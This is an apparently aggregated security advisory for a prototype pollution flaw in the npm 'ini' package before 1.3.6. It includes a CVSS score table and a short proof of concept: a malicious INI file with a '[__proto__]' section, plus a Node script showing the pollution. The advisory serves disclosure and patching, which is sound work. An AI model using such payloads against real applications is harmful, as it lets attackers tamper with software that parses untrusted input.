This affects the package ini before 1.3.6. If an attacker submits a malicious INI file to an application that parses it with ini.parse,…
snyk·CWE-1321·Published 2020-12-10
This affects the package ini before 1.3.6. If an attacker submits a malicious INI file to an application that parses it with ini.parse, they will pollute the prototype on the application. This can be exploited further depending on the context.
This affects the package ini before 1.3.6. If an attacker submits a malicious INI file to an application that parses it with ini.parse, they will pollute the prototype on the application. This can be exploited further depending on the context.
### Overview The `ini` npm package before version 1.3.6 has a Prototype Pollution vulnerability. If an attacker submits a malicious INI file to an application that parses it with `ini.parse`, they will pollute the prototype on the application. This can be exploited further depending on the context. ### Patches This has been patched in 1.3.6. ### Steps to reproduce payload.ini ``` [__proto__] polluted = "polluted" ``` poc.js: ``` var fs = require('fs') var ini = require('ini') var parsed = ini.parse(fs.readFileSync('./payload.ini', 'utf-8')) console.log(parsed) console.log(parsed.__proto__) console.log(polluted) ``` ``` > node poc.js {} { polluted: 'polluted' } { polluted: 'polluted' } polluted ```
### Overview The `ini` npm package before version 1.3.6 has a Prototype Pollution vulnerability. If an attacker submits a malicious INI file to an application that parses it with `ini.parse`, they will pollute the prototype on the application. This can be exploited further depending on the context. ### Patches This has been patched in 1.3.6. ### Steps to reproduce payload.ini ``` [__proto__] polluted = "polluted" ``` poc.js: ``` var fs = require('fs') var ini = require('ini') var parsed = ini.parse(fs.readFileSync('./payload.ini', 'utf-8')) console.log(parsed) console.log(parsed.__proto__) console.log(polluted) ``` ``` > node poc.js {} { polluted: 'polluted' } { polluted: 'polluted' } polluted ```
Esto afecta al paquete ini versiones anteriores a 1.3.6. Si un atacante envía un archivo INI malicioso a una aplicación que lo analiza con ini.parse, contaminará el prototipo de la aplicación. Esto puede ser explotado aún más dependiendo del contexto
| Version | Type | Source | Base | Exp | Impact | Vector |
|---|---|---|---|---|---|---|
| 2.0 | Primary | NVD | 7.5 | 10.0 | 6.4 | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| 3.1 | Primary | NVD | 9.8 | 3.9 | 5.9 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| 3.1 | Primary | cve.org | 7.3 | — | — | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P |
| 3.1 | Primary | cve.org | 7.3 | — | — | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P |
| 3.1 | Secondary | GHSA | 7.3 | — | — | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L |
| 3.1 | Secondary | NVD | 7.3 | 3.9 | 3.4 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L |